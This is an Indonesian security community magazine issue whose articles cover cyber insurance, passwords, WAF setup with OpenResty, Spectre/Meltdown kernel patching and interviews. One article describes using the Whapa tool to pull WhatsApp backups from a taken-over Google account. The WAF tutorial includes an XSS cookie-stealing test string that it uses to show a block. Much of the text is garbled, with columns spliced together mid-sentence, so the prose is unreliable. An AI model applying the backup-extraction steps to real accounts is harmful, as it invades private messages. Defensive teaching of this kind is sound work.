CDEF Magazine
Cyber Defense Community TURUT SERTA MENCERDASKAN KEHIDUPAN BANGSA
HOT TOPICS
MEMBEDAH WANNAMINE MALWARE
TUTORIAL
MEMBANGUN WAF SENDIRI DENGAN OPENRESTY
MITIGASI SPECTRE DAN MELTDOWN
Cyber Defense Community | Q2 2018 GRATIS TIDAK DIPERJUAL BELIKAN SECARA KOMERSIL
Magazine Kata Pengantar
Cyber Defense Community
1
Magazine
Cyber Defense Community
Selamat membaca !!
Redaksi CDEF
2
CYBER HORIZON
1
CYBER INSURANCE
- ERYK BUDI PRATAMA
7
TUTORIAL
2
DAFTAR ISI
HOT TOPICS
4
WANNAMINE, MALWARE CANGGIH
83 PEMBAJAK CPU
- CHRISTOFER SIMBARA
DAFTAR ISI
EVENTS REPORT
5
3RD MEETUP - CYBER DEFENSE COMMUNITY DI
GRHA DATACOMM
104
- TIM REDAKSI
ULASAN BUKU
6
NETWORK FORENSICS – PANDUAN ANALISIS
DAN INVESTIGASI PAKET DATA JARINGAN 118
MENGGUNAKAN WIRESHARK
- TIM REDAKSI
CHALLENGE
7
122 TEKA TEKI SECURITY
- KONTRIBUTOR
DAFTAR ISI
OPINI PEMBACA
126 - KONTRIBUTOR
1 “As the world is increasingly
interconnected, everyone
CYBER HORIZON shares the responsibility of
securing cyberspace”
– Newton Lee
sumber :
https://i2.wp.com/www.mediatelecom.com.mx/wp-content/uploads/2018
/03/mediatelecom_internet_jb280318.jpg?fit=1920%2C1080
Cyber Insurance
ditulis oleh Eryk Budi Pratama
haan. Berikut adalah beberapa faktor pen- hatan cyber serta awareness akan
d o ro n g p e r t u m b u h a n p a s a r c y b e r masalah dan risiko yang terkait den-
insurance7. gan reputasi mendorong pertumbuhan
permintaan terhadap cyber insurance,
1. Biaya dari adanya pelanggaran kea- khususnya yang bisa dikustomisasi se-
manan cyber. Terdapat peningkatan suai dengan kebutuhan perusahaan.
fikasi dan menentukan profil risiko masing- (4) What is cyber insurance and why you need it.
masing. Dalam konteks cyber insurance, https://www.cio.com/article/3065655/cyber-attacks
perusahaan perlu untuk mengidentifikasi -espionage/what-is-cyber-insurance-and-why-you-
need-it.html
risiko dan ancaman yang terkait dengan
keamanan cyber karena hal ini tidak hanya (5) Information Security And Cyber Liability Risk
jadi perhatian departemen TI, namun juga Management.
http://www.advisenltd.com/wp-content/uploads/20
dapat menjadi perhatian bisnis karena da-
15/10/information-security-cyber-liability-risk-mana
pat memberikan dampak terhadap repu- gement-report-2015-10-16.pdf
tasi perusahaan. Cyber insurance dapat di-
jadikan salah satu alternatif perusahaan da- (6) 2 0 1 7 C y b e r C l a i m s S t u d y .
https://netdiligence.com/wp-content/uploads/2017/
lam melakukan pengalihan risiko (risk trans-
10/2017-NetDiligence-Claims-Study_Public-Edition.
fer) untuk mengurangi dampak dari adanya pdf
serangan cyber yang dapat menyebabkan
(7) Economic crime: A threat to business globally.
penyalahgunaan dan kebocoran data serta
https://www.pwc.at/de/publikationen/global-econo
gangguan terhadap operasional bisnis. mic-crime-survey-2014.pdf
Inform and Enrich Analytics threat hunter dapat lebih fokus kepada
pola serangan baru lainnya, dan proses
Sebagaimana kita telah ulas bersama di berulang yang berupa hal-hal yang bersifat
bagian Threat Hunting Maturity Model, umum cukup dieksekusi oleh platform
otomasi adalah salah satu bagian yang ha- otomasi tadi.
rus dilakukan dalam tingkat kematangan di
tingkatab atas dalam sebuah proses threat 3. The Hunting Matrix
hunting. Ketika threat hunter sudah berha-
sil menentukan teknik yang digunakan oleh Setelah kita melihat Hunting Maturity
pada “bad guys”, maka fakta tersebut Model (HMM) dan Threat Hunting Loop,
akan dijadikan proses otomasi untuk men- maka pada tahapan ini kita dapat mem-
gulang proses tersebut untuk mencari buat sebuah matriks yang menghubung-
”bad guys” lainnya. Hal ini dilakukan agar kan kedua hal tersebut.
27
Lindungi Password Anda Untuk
Melindungi Data Anda
ditulis oleh Erwin Jonathan
sumber : https://www.irishtimes.com/polopoly_fs/1.2998520.1488783356!/image/image.jpg_gen/derivatives/box_620_330/image.jpg
Suatu hari saya berada didalam sebuah bank semenjak mereka pertama kali mem-
diskusi dengan sekumpulan teman-teman, buka akun tersebut. Tidak berbeda jauh
karena rasa keingintahuan maka saya me- dengan jawaban pertanyaan sebelumnya,
nanyakan kepada mereka perihal seberapa kurang dari 3 orang yang mengangkat
sering mereka mengganti PIN akun bank tangan. Mengejutkan, tetapi itulah
yang mereka miliki. Saya menanyakan kenyataan!
berdasarkan periode waktu dimulai dari
periode 1 bulan, kemudian 3 bulan, hingga Beban Untuk Semua
periode 1 tahun. Hanya 3 orang yang men-
Berapa banyak dari anda yang pernah
jawab dengan mengangkat tangan. Kemu-
mengalami situasi dimana anda menga-
dian, saya melanjutkan pertanyaan perihal
lami kesulitan dalam mengingat password
apakah mereka sudah mengganti PIN akun
Lakukan sekarang…
ERWIN JONATHAN
CISA
Perlu kita ketahui bahwa Whatsapp merupakan layanan mengirim pesan yang sangat
populer di dunia, termasuk di indonesia. Indonesia sendiri merupakan salah satu peng-
guna yang paling sering menggunakan Whatsapp untuk saling berkomunikasi dengan
nyaman dan aman. Namun dengan seiring berjalannya waktu, banyak sekali penelitian
terkait celah keamanan yang terdapat di aplikasi Whatsapp yang bisa dimanfaatkan untuk
membongkar data yang ada di dalam Whatsapp. Terkait dengan privasi pengguna yang
menggunakan layanan tersebut, biasanya untuk seseorang dapat membuka data
Whatsapp diperlukan otentikasi berupa OTP (One time password) yang biasanya dikirim-
kan melalui pesan singkat. Tujuan digunakannya OTP untuk memverifikasi keaslian dari se-
buah nomor untuk digunakan sebagai akun Whatsapp.
Dengan data yang dianggap cukup, si hacker lalu akan mencoba melihat isi dari email, his-
tory browsing dan lain sebagainya , tidak menutup kemungkinan hacker akan mengakses
google drive akun yang telah diambil alih tersebut. Lalu hacker akan melihat folder yang
berisi data backup dan data lainya yang telah otomatis tersinkronisasi dengan telepon
genggam si pemilik akun email tersebut (lihat Gambar 1).
https://github.com/B16f00t/whapa
Salah satu fungsi utama dari Whapa adalah menyajikan data yang disimpan di dalam data-
base Sqlite dengan cara yang bisa dipahami oleh analis. Tools ini ditulis dengan menggu-
nakan bahasa pemrograman Python 2.x. Secara umum perangkat lunak ini dibagi menjadi
tiga mode, yaitu :
๏ Mode Pesan. Mode ini digunakan untuk menganalisis semua pesan yang tersimpan di
dalam database, melakukan filter serta mengekstrak gambar pratinjau (thumb nail pic-
tures) yang tersedia tersedia.
๏ Decryption Mode. Mode ini digunakan untuk mendekripsi database kripto12 selama
kunci enkripsinya tersedia atau diketahui.
๏ Info Mode. Mode ini digunakan untuk menampilkan informasi yang berbeda tentang
status dan grup whatsapp.
Anda dapat mengunduh versi terbaru dari whapa dengan mengkloning repositori GitHub
dengan menjalankan perintah berikut
sebelum melakukan proses ekstraksi data dari akun google drive, maka pastikan lakukan
instalasi dependensi berikut
untuk menggunakan tools ini, jangan lupa untuk melakukan konfigurasi terhadap file
settings.cfg, dengan memasukan akun email dan password yang valid untuk akun terse-
but.
[auth]
gmail = alias@gmail.com
passw = yourpassword
python whapa.py -m
๏ Mode Info
python whapa.py -i
Kesimpulan
Data data yang kita anggap selama ini aman karena telah tersimpan di Google Drive men-
jadi tidak ada artinya, apalagi jika di dalam data backup tersebut ada data–data yang bersi-
fat sangat sensitif, maka tidak menutup kemungkinan untuk dijadikan bahan pemerasan
atau black mail. Semoga informasi yang sangat sederhana dari seorang script kiddies
yang ingin menjadi seorang yang handal di bidang cyber defense dapat meningkatkan ke-
waspadaan atau security awareness.
Catatan
Terkait dengan PoC (Proof of Concept), penulis tidak menyertakan dikarenakan pemilik
akun yang telah bersedia untuk dilakukan uji coba tidak ingin dilakukan publikasi terkait
hasil dari apa yang telah ditampilkan pada penggunaan tools untuk menampilkan data
yang telah berhasil didapatkan dan terkait screenshoot yang terdapat nomor handphone
adalah nomor penulis. Namun penulis dapat melakukan POC terkait artikel yang telah di-
tulis jika ada yang berminat untuk ditampilkan data whatsappnya sebagai acuan untuk
pembelajaran semata.
38
“Companies spend millions
of dollars on firewalls,
Web Application Firewall (WAF) adalah komponen penting dalam struktur pertahanan
berlapis (defense-in-depth). Tuntutan bisnis dimana software perlu dikembangkan dengan
cepat, maka security seringkali menjadi bukan prioritas utama. Sehingga hal ini menyebab-
kan software yang vulnerable atau kondisi lingkungan uji (test environment) yang tidak
seragam dengan production.
3. Instalasi lua-resty-waf
4. Integrasi
Proses build diatas dilakukan pada direktori /opt dan Openresty dipasang pada direktori
/usr/local/openresty. Berikut adalah diagram proses dari stack yang akan kita uji.
Openresty bisa didapatkan dalam bentuk source code dan binary release. Kita akan me-
makai source code karena penulis akan mencontohkan cara melakukan build openresty
dengan openssl library bawaan agar binary Openresty ini nantinya akan memakai versi
OpenSSL terbaru.
Pada repositori di atas terdapat file install.sh yang menunjukkan script lengkap untuk
proses instalasi Openresty yang akan kita pakai. Jalankan script install.sh yang akan me-
masang Openresty pada path /usr/local/openresty
Instalasi dependencies
Lalu jalankan ./configure untuk membuat konfigurasi build Openresty dan OpenSSL.
./configure \
--with-cc-opt='-O3 -Ofast -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexcep-
tions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-
switches -m64 -mtune=native -DTCP_FASTOPEN=23' \
--with-pcre-jit \
…(string omitted)
[Unit]
Description=NGINX with LUA
After=syslog.target network.target remote-fs.target nss-lookup.target
[Service]
Type=forking
PIDFile=/var/run/openresty.pid
ExecStartPre=/usr/local/openresty/nginx/sbin/nginx -t
ExecStart=/usr/local/openresty/nginx/sbin/nginx -c
/usr/local/openresty/nginx/conf/nginx.conf
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true
[Install]
WantedBy=multi-user.target
Simpan file tersebut pada lokasi systemd, dan lakukan daemon-reload. Berikut adalah
contoh prosedur yang dilakukan pada install.sh untuk instalasi unit file:
rm -f /usr/lib/systemd/system/openresty.service
cp ./util/openresty.service /usr/lib/systemd/system/ -v
rm -f /usr/local/bin/openresty
ln -s /usr/local/openresty/bin/openresty /usr/local/bin/openresty
systemctl daemon-reload
systemctl enable openresty
Jika eksekusi install.sh telah berhasil maka command systemctl status openresty
jika dijalankan akan memberikan hasil sebagai berikut
Kunjungilah IP address mesin ini melalui browser untuk membuka welcome page Openre-
sty.
Penulis memakai domain spoof test.com yang diset di file hosts lokal dan mengarah ke-
pada lokal Virtual Machine. Instalasi wordpress dan stack-nya tidak penulis bahas pada ar-
tikel ini.
Penulis sudah menyiapkan repositori contoh implementasi stack ini pada github :
https://github.com/rendraperdana/openresty-wordpress
#3 - Instalasi lua-resty-waf
Lua-resty-waf adalah lua module untuk Openresty yang dimiliki oleh Robert Paprocky
pada repositori https://github.com/p0pr0ck5/lua-resty-waf. Modul ini dipasang setelah
Openresty berhasil dipasang pada sistem. Kita akan membahas proses instalasi depen-
densi untuk modul ini kedalam Openresty secara bertahap.
2. ln -s /usr/local/openresty/bin/resty /usr/local/bin/
Instalasi luarocks-2.4.2
Instalasi LuaJIT
Instalasi lua-resty-waf
4. Proses instalasi akan melakukan instalasi beberapa lua modul tambahan dan basic
rule untuk WAF
Jika proses instalasi telah selesai maka cek pada direktori /usr/local/openresty/
site/lualib/resty disana akan ada direktori waf dan waf.lua
Lua-resty-waf ini memilki rules contoh bawaan namun tidak memiliki file konfigurasi de-
fault bawaan. Pembuatan file konfigurasi dan contoh integrasinya akan penulis bahas
pada bagian berikutnya.
# 4 - Integrasi
init_by_lua_block {
require "resty.core"
local lua_resty_waf = require "resty.waf"
lua_resty_waf.init()
}
Perintah diatas disimpan pada file wafinit.conf dan dipanggil pada block http{} di
NGINX dengan perintah include. Berikut contoh file nginx.conf penulis:
user nobody;
worker_processes auto;
events {
worker_connections 4096;
use epoll;
multi_accept on;
}
http {
include mime.types;
default_type application/octet-stream;
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 15;
include wafinit.conf;
include sites/test.com.conf;
}
Lalu untuk fungsi WAF dipanggil pada pada server{} atau location{} bisa dilakukan
dengan perintah sebagai berikut
access_by_lua_block {
local lua_resty_waf = require "resty.waf"
local waf = lua_resty_waf:new()
waf:set_option("debug", true)
waf:set_option("mode", "ACTIVE")
waf:set_option("score_threshold", 8)
waf:set_option("event_log_target", "file")
waf:set_option("event_log_target_path", "/var/log/nginx/waf.log")
waf:set_option("event_log_level", ngx.WARN)
waf:set_option("event_log_request_arguments", true)
waf:set_option("event_log_request_headers", true)
waf:set_option("event_log_request_body", true)
waf:set_option("event_log_periodic_flush", 5)
waf:exec()
}
header_filter_by_lua_block {
local lua_resty_waf = require "resty.waf"
local waf = lua_resty_waf:new()
waf:exec()
}
body_filter_by_lua_block {
local lua_resty_waf = require "resty.waf"
local waf = lua_resty_waf:new()
waf:exec()
}
waf:exec()
}
Perintah diatas disimpan dalam file wafstart.conf dan akan dipanggil dengan include
pada server ataupun lokasi yang ingin dilidungi.
fastcgi.conf
fastcgi_params
mime.types
nginx.conf
sites/
! |-------test.com/
! |-------test.com.conf
wafinit.conf
wafstart.conf
server {
listen 80;
server_name test.com;
charset utf-8;
root conf/sites/test.com/;
index index.php index.html index.htm;
location = /50x.html {
root html;
}
location ~ /\. {
access_log off;
log_not_found off;
deny all;
}
location / {
include wafstart.conf;
try_files $uri $uri/ /index.php?q=$uri&$args;
}
location ~ \.php$ {
fastcgi_pass unix:/var/run/php7.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
}
Perhatikan pada location / penulis menambahkan include wafstart.conf. dalam hal ini ber-
arti WAF aktif untuk seluruh url pada site test.com.
Kita bisa melakukan aktifasi berdasarkan lingkup peletakan lokasi atau berdasarkan
konfigurasi dari wafinit.conf dari parameter waf:set_option("mode", "ACTIVE").
Jika ACTIVE diganti dengan SIMULATE, maka attack akan tercatat namun tidak terblokir.
<script>alert(document.cookie)</script>
Lalu klik search atau tekan enter. Openresty akan memberikan response HTTP 403 For-
bidden. Kemudian lihat pada file /var/log/nginx/waf.log, dimana attack di atas bisa
diperiksa secara lebih detail.
{"timestamp":1521129014,"request_headers":{"host":"test.com","connection":"keep-alive","upgrad
e-insecure-requests":"1","referer":"http:\/\/test.com\/","accept-encoding":"gzip,
deflate","user-agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML,
like Gecko) Chrome\/64.0.3282.186
Safari\/537.36","cookie":"wordpress_test_cookie=WP+Cookie+check","accept-language":"en-US,en;q
=0.9,id;q=0.8","dnt":"1","accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,im
age\/webp,image\/apng,*\/*;q=0.8"}
"id":"b5d85110d941296c6ecf","method":"GET","uri":"\/","client":"192.168.150.1","uri_args":{"s"
:"<script>"},"alerts":[{"msg":"XSS (Cross-Site Scripting)","id":42059,"match":1},{"msg":"XSS
(Cross-Site Scripting) - HTML Tag Handler","id":42069,"match":1},{"msg":"XSS (Cross-Site
Scripting) - IE Filter","id":42083,"match":1},{"logdata":12,"msg":"Request score greater than
score threshold","id":99001,"match":12}]}
1. Attack di atas memiliki violation score sebesar 12 yang didapat dari gabungan 3 score
violation dari RuleID 42059, 42069 dan 42083.
2. Attack diatas di denied karena score lebih besar dibandingkan option yang telah diset
yaitu: waf:set_option("score_threshold", 8)
! {
"actions" : {
"disrupt" : "SCORE",
"nondisrupt" : [
{
"action" : "setvar",
"data" : {
"col" : "TX",
"inc" : 1,
"key" : "anomaly_score",
"value" : 4
}
}
]
},
"id" : 42059,
"msg" : "XSS (Cross-Site Scripting)",
"operator" : "REFIND",
"opts" : {
"transform" : [
"html_decode",
"compress_whitespace"
]
},
"pattern" : "< ?script\\b",
"vars" : [
{
"parse" : [
"all",
1
],
"type" : "REQUEST_ARGS"
}
]
}
Rule diatas memiliki anomaly score sebesar 4 dan regex "< ?script\\b" perlu diketa-
hui bahwa encoding karakter \ harus dengan \\ (double slash). Sehingga dalam rule diatas
regex sebenarnya adalah
“< ?script\b” yang cocok dengan kata <script> pertama pada injection string yang
dicontohkan.
Penulis telah menguji stack diatas pada beberapa platform production dan terbukti cukup
handal, benefit terbaik yang penulis rasakan adalah mudahnya integrasi dan kostumisasi
sehingga mempercepat time-to-market dan menjamin homogenitas environment produc-
tion dan QA (Quality Assurance).
Referensi
1. (Re)Introducing lua-resty-waf,
https://www.cryptobells.com/reintroducing-lua-resty-waf/
RENDRA PERDANA
CISSP, Senior Principal Security
Engineer Blibli.com
Akhir tahun 2017 lalu dunia keamanan TI dihebohkan dengan ditemukannya vulnerabilities
yang memanfaatkan kelemahan desan dari mikroprosesor yang menyebabkan proses bisa
membaca memory area dari kernel dan data yang dimiliki proses lain.
Google engineer lalu mengusulkan patch yang bernama retpoline untuk mencegah proses
memanfaatkan celah ini. Pada kernel versi 4.9.y, patch untuk merge code retpoline ini su-
dah masuk sejak versi 4.9.77 (tanggal rilis 17 Januari 2018) dan telah di backport oleh ham-
pir sebagian besar distro populer terhadap rilis kernel masing-masing.
Untuk Meltdown dimitigasi dengan satu cara yaitu Page-Table Isolation (PTI). Namun
patch Spectre (proses bisa melihat data proses lain) memiliki variasi implementasi yang
berbeda-beda tergantung kepada vendor CPU (AMD/Intel) dan compiler yang dipakai
ketika kompilasi kernel tersebut.
Penulis memakai versi kernel 4.14.19 dengan compiler GCC-7.3.0 dan informasi menge-
nai kernel yang anda pakai bisa dilihat dengan perintah sebagai berikut
cat /proc/version
Kesulitan utama dalam meraih grade patching “Full generic retpoline” adalah compiler
yang dipakai harus versi 7.3.0. Mari kita lihat status patch kernel latest dari distro Centos
7 dengan menjalankan perintah sebagai berikut :
cat /proc/version
Penulis memakai Centos 7 dan berikut tahapan untuk mengkompilasi kernel dengan full
generic retpoline:
1. Instalasi devtoolset-7
Pada tahapan diatas penulis memakai Centos 7 minimal, dengan direktori tujuan down-
load berada di /opt.
Peringatan!
Penulis menyarankan agar proses ini dilakukan pada virtual machine dan karena GCC
system akan ditimpa maka vm ini tidak disarankan dipakai untuk kompilasi lain. Penulis
menemukan inkompatibilitas terhadap berbagai kompilasi source code open-source
lain ketika memakai GCC-7.3.0, contohnya Redis-4.0.8 dan OpenSSL-1.0.2n
# 1 - Instalasi Devtoolset-7
Devtoolset adalah satu paket yang terdiri dari GNU Compiler Collection (GCC), GNU De-
bugger (GDB), dan software pendukung lainnya. Saat tulisan ini dibuat Devtoolset-7 me-
makai GCC versi 7.2.1
gcc –version
Jika anda ingin keluar dari environment scl, silahkan exit seperti biasa (CTRL+D) atau per-
intah exit. Tahapan instalasi devtoolset-7 telah selesai.
Kompilasi GCC memerlukan beberapa library gcc-infrastructure seperti MPFR, GMP dan
MPC yang bisa diinstall dengan perintah:
Source code untuk GCC-7 bisa didapatkan dari mirrors yang ada pada halaman:
https://gcc.gnu.org/mirrors.html
Pilihlah mirror yang paling dekat dengan anda, maka masuk kedalam direktori
releases/gcc-7.3.0/ terdapat dua pilihan gcc-7.3.0 yaitu dalam format kompresi xzip
dan gzip.
wget http://ftp.tsukuba.wide.ad.jp/software/gcc/releases/gcc-7.3.0/gcc-7.3.0.tar.gz
Kemudian masuk ke dalam direktori gcc-7.3.0 dan pastikan sekali lagi bahwa GCC versi
7.2.1 sudah aktif pada environment anda lalu konfigurasi makefile anda dengan perintah:
Jika tidak ada error maka lanjutkan dengan proses kompilasi melalui perintah:
make -j
atau jika anda melakukan compile pada server dengan core lebih dari, maka jalankan perin-
tah berikut :
Proses kompilasi diatas memakan waktu kurang lebih 30 menit pada prosesor Intel-i5
6600k (4 core 4 threads) @ 4.4 GHz.
Jika telah selesai silahkan lanjutkan dengan instalasi dengan perintah berikut
make install
Jika telah selesai, keluar dari environment scl dengan (CTRL+D) atau exit. Lalu verifikasi
dengan:
gcc –version
Proses kompilasi dan instalasi GCC-7.3.0 telah selesai dan kita bisa lanjut ke tahapan
utama, yaitu konfigurasi dan kompilasi kernel.
# 3 - Konfigurasi Kernel
Proses kompilasi akan memakai RAM sebesar 24-27 GB dan disk free space sebesar
20GB. Untuk memulai, terlebih dahulu install beberapa software yang dibutuhkan untuk
proses kompilasi kernel:
Kemudian unduh source code kernel melalui website kernel.org, pilih versi stable yang
anda inginkan, anda bisa memilih versi yang tersedia dengan hanya mengubah alamat
download. Pada contoh ini penulis memakai versi 4.14.19 yang diunduh dengan perintah:
wget https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.14.19.tar.xz
Lalu masuk ke dalam direktori linux-4.14.19 dan ketik perintah berikut untuk masuk keda-
lam menu konfigurasi kernel:
make menuconfig
Periksa konfigurasi patch meltdown pada path Security Options dan pastikan ada tanda
(*) (lihat Gambar berikut)
Tekan tanda tanya (?) pada menu tersebut untuk menampilkan keterangan sebagai berikut
Lalu pada menu General Setup berikan (*) pada Enable bpf() system call dan menu di
bawahnya (lihat gambar berikut)
Pastikan juga fitur KASLR diaktifkan, menu tersebut ada pada menu Processor type and
features
Lalu berilah nama pada rilis kernel ini pada pilihan Local Version pada menu General
Setup
# 4 - Kompilasi Kernel
Lalu mulailah kompilasi dengan perintah:
make rpm -j
Jika ada kegagalan pada proses build, backup file .config anda lalu cleanup dengan:
make clean
atau
make distclean
Proses compile kernel ini memakan waktu sekitar 15-30 menit dan kernel akan berada
pada direktori rpmbuild/RPMS/x86/ di home direktori user. Apabila kernel sudah berada
dalam bentuk RPM yang bisa langsung diinstall dengan perintah:
grub-set-default 0
grub2-mkconfig > /etc/grub2.conf (atau grub2-efi.conf jika anda boot dengan EFI)
reboot system anda dan setelah reboot verifikasi versi kernel berjalan dengan:
uname -a
atau
cat /proc/version
# 5 - Checking
lalu cek mitigasi Meltdown dan Spectre dengan:
Anda bisa cek melalui /var/log/dmesg untuk melihat apakah proteksi diatas aktif pada
saat boot.
Selesai sudah proses kompilasi dan instalasi kernel yang telah terproteksi dengan patch
dan memakai compiler yang sesuai. Tahapan berikutnya adalah menguji efektifitas kernel
terhadap security bug dan kehandalan serta kecepatannya terhadap penggunaan sehari-
hari, terutama pada skenario server. Anda bisa melakukan pengujian ini dengan framework
test dari Phoronix yang anda bisa dapatkan pada alamat berikut
https://github.com/phoronix-test-suite/phoronix-test-suite
Referensi
1. Retpoline: Binary mitigation for branch-target-injection (aka "Spectre"),
https://lwn.net/Articles/742980/
2. Retpoline Backported To Linux 4.9, Linux 4.14 Kernels,
https://www.phoronix.com/scan.php?page=news_item&px=Linux-4.9-4.14-Retpoline
3. I want life to be boring, says Linus Torvalds as Linux 4.15 debuts,
https://www.theregister.co.uk/2018/01/28/linux_4_15_debuts/
Kali ini Tim Redaksi CDEF mendapat ke- yata dia adalah salah satu sosok wanita di
sempatan yang sangat besar untuk Indonesia yang lebih memilih menekuni
bertemu dengan salah satu pegiat kea- bidang keamanan siber, dimana hal ini
manan siber wanita di Indonesia. Dia ada- mungkin salah satu profesi yang jarang
lah seorang analis keamanan di salah satu ditekuni oleh sebagian besar wanita di In-
perusahaan penyedia layanan keamanan donesia. Untuk mengenal lebih dekat ba-
siber terkemuka di Indonesia. Namanya gaimana sosoknya mari kita simak hasil li-
adalah Normis Sisilya, mungkin masih ter- putan redaksi CDEF yang diliput langsung
dengar awam di telinga kita, namun tern- oleh Mas Sida Nala.
A : Menurut saya,
komunitas Cy-
ber Defense
A : Menurut saya, peluang itu relatif dan ti- Pemerintah juga bisa meminta data dari be-
dak hanya berlaku bagi kaum wanita saja. berapa perusahaan mengenai para pega-
Mungkin sebaiknya meningkatkan kemam- wai wanitanya yang bekerja di bagian IT
puan softskill dan hardskill yang dimiliki Security, sehingga ketika ada aktifitas
sekarang terlebih dahulu, maka karir juga yang diadakan oleh pemerintah dan ber-
nantinya akan ikut. hubungan dengan IT Security dapat langs-
ung diinfokan kepada mereka.
Q: Menurut anda, apa yang harus dilaku-
kan pemerintah dalam hal ini BSSN un- Q: Ada ngga sih mba tokoh wanita di
tuk membuat wanita di Indonesia ter- dunia IT Security yang mba normis ido-
tarik untuk bekerja di bidang keaman si- lakan ? Kalo ada kenapa sih mba
ber (cybersecurity) ? Normis mengidolakannya ?
A : Kalau menurut saya, mungkin sudah A : Wanita hebat yang saat ini saya tau suk-
banyak yang mulai tertarik dan bahkan su- ses dalam dunia IT Security itu Amanda
dah ada bekerja di bidang IT Security, Rousseau sehingga saya mengidolakan
hanya saja mungkin masih belum banyak beliau, tidak ada alasan khusus karena
yang ter-ekspose oleh pemerintah atau menurut saya semua wanita yang sukses
komunitas-komunitas security. dalam dunia IT Security itu hebat dan
jenius.
Mungkin dapat dimulai dengan meningkat-
kan sosialisasi bahwa wanita juga bisa Q: Terakhir, Quotes anda terkait dengan
bekerja atau menggeluti bidang IT Secu- dunia keamanan siber ?
rity, misalnya dalam bentuk seminar dan
lain-lain. Bisa juga dengan ikut kekinian A : Menjadi pemula bukanlah hal yang me-
membuat bulletin seperti yang dibuat oleh malukan, yang memalukan adalah ketika
komunitas CDEF atau channel youtube selamanya masih menjadi pemula. Jangan
yang mewawancarai para pekerja wanita takut untuk memulai, tapi takutlah ketika
di bidang IT Security sehingga dapat kamu tidak berkembang. Jadikan ketaku-
kan itu motivasi untuk mau lebih berkem-
bang lagi.
Log Management (Graylog), Security Infor-
mation and Event Management (SIEM) Ali-
enVault, Incident Response, Vulnerability
Assessment.
70
“Lebih dekat dengan salah satu srikandi
keamanan siber Indonesia - Annisa Fitriana“
Di kesempatan yang berbeda pula Tim Re- menekuni riset di bidang cryptocurrency.
daksi mendapat kehormatan untuk bisa Untuk mengenal lebih dekat bagaimana so-
mewawancarai srikandi keamanan siber di sok mba Icha ini, mari kita simak wawan-
Indonesia lainnya. Kali ini adalah mba caranya dengan Tim redaksi
Annisa atau yang hangat disapa mba Icha.
Dia adalah salah satu wanita yang berani Q : Bisa cerita sedikit ngga, Sejak kapan
memberanikan dirinya untuk terjun me- menggeluti dunia IT Security? Awal mu-
nekuni bidang keamanan siber. Tidak lanya gimana sih mbak ?
tanggung-tanggung dia pun mengambil
A : Saya sudah tertarik dengan dunia IT Se-
jenjang S2 di University of Southampton
curity sejak saya kuliah di semester 6.
dengan bidang minat Cybersecurity dan
Waktu itu iseng ikutan sharing teknik hack-
di dunia kerja yang terbuka banget kalau kiri kalau bidang ini terkenalnya ya dipe-
diajak sharing mengenai bidang ini, sampe nuhin sama laki-laki. Saya sih gak nge-
saya suka gak tahu waktu. jadiin ini halangan, selama dengan meng-
geluti bidang itu kamu bisa jadi happy, go
Kalau ditanya yang paling, saya akan pilih for it girls, nothing can stop you, not even
mentor saya yang ga ada bosennya ngin- the stereotyping stuff. :D
getin saya untuk terus explore dunia IT Se-
curity ini dan nyemangatin kalau saya lagi Q : Apa sih kira-kira bedanya kalau ber-
gak semangat untuk terus mencoba untuk profesi di IT Security dengan profesi
improve. lain?
Q : Berapa banyak wanita di kantor atau A : Wah, saya bingung ini jawabnya,
yang anda kenal, yang fokus ke dunia IT karena perbedaan yang pertama terlintas
Security? oleh saya sangat subjektif sekali. Saya per-
nah mencoba untuk terlibat dalam projek
A : Sejauh ini untuk yang benar-benar non IT Security dan feel nya gak dapet,
fokus ke dunia IT Security hanya 5 orang, sayanya kurang bisa menikmati, mungkin
kebanyakan adalah teman-teman saya ku- karena sudah kecantol duluan sama IT Se-
liah. curity nya, jadi ya sulit, mau dipaksain
kayak gimana juga susah. Jadi perbedaan
Q : Selama berkarir di dunia IT Security, pertama (subjektif) saya adalah karena
ada ngga sih mba sebenernya masalah saya sudah terlanjur suka, beda dengan
kesetaraan gender di bidang IT Secu- bidang lainnya.
rity?
Sedikit lebih objektif, profesi ini adalah
A : Wah iya, kerasa sekali. Kalau di dunia topik yang relatif baru dan mulai berkem-
kerja minim sekali, perbandingan perem- bang pesat, seiring dengan berkem-
puan dan laki-lakinya yang fokus di IT Se- bangnya technology. Dengan semakin ber-
karena bertolak belakang dengan kemuda- tor yang tepat. Mentor yang tepat bisa
han yang biasa ditawarkan kepada dan di- membimbing anak-anak “bawang” seperti
saya. Dia bisa berbagi pengalamannya di
dapat oleh pengguna. It is an art, tentang
bidang tersebut sehingga dapat dijadikan
bagaimana menyajikan sesuatu yang
pembelajaran, baik untuk mengikuti jejak
security-oriented tapi tetap bisa membuat
suksesnya dan menghindari kesalahan
pengguna mau dan bahagia menggunakan
yang pernah dia lakukan sehingga kita
teknologinya. The people are just trying
bisa belajar dari kesalahan-kesalahan lain
to save your information.
yang baru yang mungkin kita lakukan nanti-
Q : Menurut anda pada awal menapaki nya (saya percaya kita belajar dari kesala-
karir, mana sih yang lebih efektif han, embrace it).
apakah belajar sendiri, belajar sama te-
Q : Tantangan anda ketika bekerja di IT
man, mengikuti edukasi formal atau
Security sejauh ini seperti apa?
non-formal?
A : Duet maut dengan kenyamanan peng-
A : Kalau ini akan sangat bergantung den-
guna dan pengembang selalu menjadi tan-
gan kebiasaan dan cara belajar per indi-
tangan tersendiri. Terus explore sebagai
vidunya. Kalau saya tipe yang prefer edu-
bentuk upgrade dan update knowledge
kasi formal karena entah mengapa, saya
terutama mengenai sistem keamanan
merasa seolah-olah lebih terpacu untuk be-
teknologi terbaru juga menjadi salah satu
lajar lebih. Kerjasama dan kompetisi den-
tantangannya.
gan teman yang “senasib”, lebih efektif un-
tuk membuat saya lebih semangat lagi be- Q : Menurut anda skill apa yang paling
lajarnya. penting bagi pemula khususnya wanita
yang ingin menggeluti dunia keamanan
Ini bukan berarti jalan saya applicable buat
siber?
semuanya ya, sekali lagi, tergantung den-
gan tipe orangnya. Banyak juga temen
Q : Menurut anda, bagaimana peluang Yang sangat disayangkan adalah jika talent
